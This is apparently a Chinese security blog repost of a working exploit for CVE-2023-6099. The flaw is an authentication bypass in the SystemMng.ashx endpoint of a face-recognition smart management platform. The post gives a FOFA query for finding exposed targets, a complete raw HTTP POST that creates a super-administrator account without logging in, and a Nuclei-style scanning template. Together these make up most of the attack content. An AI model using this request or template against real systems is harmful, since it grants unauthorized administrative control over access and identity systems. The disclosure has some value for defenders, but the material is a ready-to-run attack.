message
一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。
Vulnerability recurrence
1.使用以下fofa语句进行资产收集,确认测试目标
title="欢迎使用脸爱云 一脸通智慧管理平台"
2.用burp抓包向网站发送如下数据包
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
3.响应200即成功创建账号为数据包内容
登陆后台可以看到自己创建的账号拥有管理员权限
Batch script
id: CVE-2023-6099
info:
name: 一脸通智慧管理平台权限绕过漏洞
author: nihao
severity: high
description: '脸爱云一脸通智慧管理平台'
tags: 2023
metadata:
max-request: 3
fofa-query: title="欢迎使用脸爱云 一脸通智慧管理平台"
verified: true
http:
- method: POST
path:
- "{{BaseURL}}/SystemMng.ashx"
headers:
Accept-Encoding: gzip, deflate
Accept-Language: en
body: "operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators"
matchers:
- type: dsl
dsl:
- "status_code == 200"
原文始发于微信公众号(揽月安全团队):一脸通智慧管理平台权限绕过漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论